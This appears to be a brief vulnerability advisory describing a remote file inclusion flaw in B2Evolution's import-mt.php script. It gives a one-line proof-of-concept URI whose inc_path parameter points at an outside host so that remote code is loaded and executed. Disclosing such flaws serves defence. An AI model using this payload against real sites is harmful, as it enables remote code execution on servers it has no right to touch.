B2Evolution Import-MT.PHP Remote File Include Vulnerability

B2Evolution Import-MT.PHP Remote File Include Vulnerability

An attacker may exploit this issue using a web client.

The following proof-of-concept URI is available:

http://www.example.com/<b2epath>/inc/CONTROL/import/import-mt.php?basepath=foo&inc_path=https://www.example2.com/tarkus/PoC/